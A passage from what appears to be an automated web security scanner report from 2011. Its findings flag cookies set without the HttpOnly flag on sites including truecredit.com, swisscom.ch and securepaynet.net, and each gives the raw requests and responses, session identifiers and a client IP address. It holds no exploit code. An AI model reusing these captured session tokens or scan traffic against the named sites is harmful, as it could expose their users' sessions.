Set-Cookie: ASPSESSIONIDAAQRCDBS=GMEFDDNBJACEDAEBDEJMCKNC; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:46 GMT
Connection: close


18.152. https://www.securepaynet.net/gdshop/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.securepaynet.net
Path:   /gdshop/basket.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/basket.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Sat, 23 Apr 2011 16:50:44 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAEQRCDBS=EMEFDDNBCCNAODBIDAFKNMAE; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:45 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.153. http://www.swisscom.ch/res/hilfe/kontakt/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /res/hilfe/kontakt/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/hilfe/kontakt/index.htm HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=konxap55khxflt55gkhxc1up; path=/
Set-Cookie: languageId=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49378
X-Cache: MISS from www.swisscom.ch


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...

18.154. http://www.truecredit.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.truecredit.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truecredit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_visit%3D1%7C1303680178921%3B%20s_depth%3D1%7C1303680178926%3B%20dfa_cookie%3Dtuitruecredit%7C1303680178936%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%255D%7C1461531178941%3B%20s_invisit%3Dtrue%7C1303680178950%3B%20s_lv%3D1303678378956%7C1398286378956%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680178956%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680178964%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:45:45 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303692345875
Set-Cookie: TCVISIT=558555500-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=gQcVE8W9hMYg; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34723


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="http://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Tru
...[SNIP]...

18.155. https://www.truecredit.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_visit%3D1%7C1303676208552%3B%20s_depth%3D1%7C1303676208554%3B%20dfa_cookie%3Dtuitruecredit%7C1303676208557%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%255D%7C1461527208560%3B%20s_nr%3D1303674408563%7C1306266408563%3B%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303676208564%3B%20s_lv%3D1303674408567%7C1398282408567%3B%20s_lv_s%3DFirst%2520Visit%7C1303676208567%3B%20s_pv%3Dtc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676208571%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674408562%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:15:30 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303676130100
Set-Cookie: JSESSIONID=aI2zc6tC6-qf; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29076


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>On
...[SNIP]...

18.156. https://www.truecredit.com/products/optimizedOrder.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/optimizedOrder.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_depth%3D1%7C1303693477019%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_visit%3D1%7C1303693853489%3B%20dfa_cookie%3Dtuitruecredit%7C1303693853506%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%255D%7C1461544853528%3B%20s_invisit%3Dtrue%7C1303693853537%3B%20s_lv%3D1303692053541%7C1398300053541%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693853541%3B%20s_pv%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693853547%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20s_ppv%3D100%3B%20SC_LINKS%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%255E%255Ehttp%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255Etc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%2520%257C%2520http%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:04 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303695004739
Set-Cookie: TCVISIT=558558858-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=dEs-TS58-_K8; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Ch
...[SNIP]...

18.157. https://www.truecredit.com/products/optimizedOrderProcess  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/optimizedOrderProcess

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /products/optimizedOrderProcess HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU
Cache-Control: max-age=0
Origin: https://www.truecredit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_depth%3D2%7C1303693860797%3B%20s_visit%3D1%7C1303693873610%3B%20dfa_cookie%3Dtuitruecredit%7C1303693873619%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692060815'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692073007'%255D%252C%255B'%25257C%25257C%25257C%25257CFree7DayTrialSingleCMU%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692073645'%255D%255D%7C1461544873645%3B%20s_invisit%3Dtrue%7C1303693873654%3B%20s_lv%3D1303692073661%7C1398300073661%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693873661%3B%20s_pv%3Dtc%253Atc%253Atc%253AOrder%2520Form%253A%2520Personal%2520Info%2520%252F%2520Account%2520details%7C1303693873673%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B%20s_sq%3Dtuitruecredit%253D%252526pid%25253Dtc%2525253Atc%2525253Atc%2525253AOrder%25252520Form%2525253A%25252520Personal%25252520Info%25252520%2525252F%25252520Account%25252520details%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257Bnextpage%2525253Dtrue%2525253Bdocument.optimizedOrder.submit()%2525253Breturnfalse%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Content-Length: 361

formName=optimizedOrder&versionID=0&title=0&firstName=&middleName=&lastName=&suffix=0&email=&mailAddress=&mailCity=&mailState=&mailZipCode=&prevAddressTwoYears=&prevCityTwoYears=&prevStateTwoYears=&pr
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 01:30:09 GMT
Server: Apache
Cache-Control: private
enable-url-rewriting: true
Location: https://www.truecredit.com/products/optimizedOrder.jsp
Set-Cookie: TLSESSIONID=1303695009711
Set-Cookie: JSESSIONID=d6FtIxwFg9Ha; path=/
Content-Length: 92
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

The URL has moved <a href="https://www.truecredit.com/products/optimizedOrder.jsp">here</a>

18.158. https://www.truecredit.com/products/order2.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /products/order2.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:12:21 GMT
Server: Apache
Cache-Control: no-cache,must-revalidate
pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: TLSESSIONID=1303675941653
Set-Cookie: TCID=1303675941653:AM_; path=/; expires=Mon, 11-Apr-2061 20:12:21 GMT
Set-Cookie: JSESSIONID=if_ae8AEJAM_; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12840


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onl
...[SNIP]...

18.159. https://www.truecredit.com/user/returnUser.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /user/returnUser.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/returnUser.jsp?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_depth%3D2%7C1303676296690%3B%20s_visit%3D1%7C1303676296771%3B%20dfa_cookie%3Dtuitruecredit%7C1303676296794%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%255D%7C1461527296801%3B%20s_nr%3D1303674496805%7C1306266496805%3B%20s_invisit%3Dtrue%7C1303676296810%3B%20s_lv%3D1303674496815%7C1398282496815%3B%20s_lv_s%3DFirst%2520Visit%7C1303676296815%3B%20s_pv%3Dtc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676296824%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20SC_LINKS%3Dtc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%255E%255ELog%2520into%2520your%2520account%255E%255Etc%253Atc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%2520%257C%2520Log%2520into%2520your%2520account%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:16:02 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303676162226
Set-Cookie: JSESSIONID=a_yt5CZn2T8f; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onli
...[SNIP]...

18.160. https://www.truecredit.com/user/returnUserProcess  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /user/returnUserProcess

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /user/returnUserProcess?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/user/returnUser.jsp?cb=credit
Cache-Control: max-age=0
Origin: https://www.truecredit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_depth%3D4%7C1303676301167%3B%20s_nr%3D1303674501185%7C1306266501185%3B%20s_visit%3D1%7C1303680175830%3B%20dfa_cookie%3Dtuitruecredit%7C1303680175838%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%255D%7C1461531175845%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303680175849%3B%20s_lv%3D1303678375858%7C1398286375858%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680175858%3B%20s_pv%3Dtc%253Atc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680175866%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674501182%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B%20s_sq%3Dtuitruecredit%253D%252526pid%25253Dtc%2525253Atc%2525253ALogin%25252520%2525253A%25252520Return%25252520User%25252520Login%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257Bnextpage%2525253Dtrue%2525253Bdocument.memberLogin.submit()%2525253Breturnfalse%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Content-Length: 87

formName=memberLogin&versionID=0&username=&password=&loginPage=%2Fuser%2FreturnUser.jsp

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:52:44 GMT
Server: Apache
Cache-Control: private
enable-url-rewriting: true
Location: https://www.truecredit.com/user/returnUser.jsp?incorrect=true&cb=credit
Set-Cookie: TLSESSIONID=1303678364906
Set-Cookie: JSESSIONID=abH_XutDvEw9; path=/
Content-Length: 109
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

The URL has moved <a href="https://www.truecredit.com/user/returnUser.jsp?incorrect=true&cb=credit">here</a>

18.161. http://www.upsellit.com/custom/trustedID.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.upsellit.com
Path:   /custom/trustedID.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/trustedID.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:07:11 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; Path=/
Set-Cookie: uid=CgoKBU20gu++zjv3FP/AAg==; expires=Mon, 23-Apr-12 20:07:11 GMT; domain=www.upsellit.com; path=/
P3P: policyref="http://www.upsellit.com/w3c/p3p.xml", CP="NON DSP LAW CUR ADMi TAIi PSAi PSD TELi OUR SAMi IND PHY DEM ONL STA NAV UNI LOC COM CNT"
Content-Length: 9317


var usiURL = location.href;
if (usiURL.indexOf("promoRefCode=CJ") != -1 || usiURL.indexOf("promoRefCode=IDTHL") != -1 || usiURL.indexOf("promoRefCode=NEXTWEB") != -1){
var USILink = "http://
...[SNIP]...

18.162. http://2byto.com/bluepixel/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
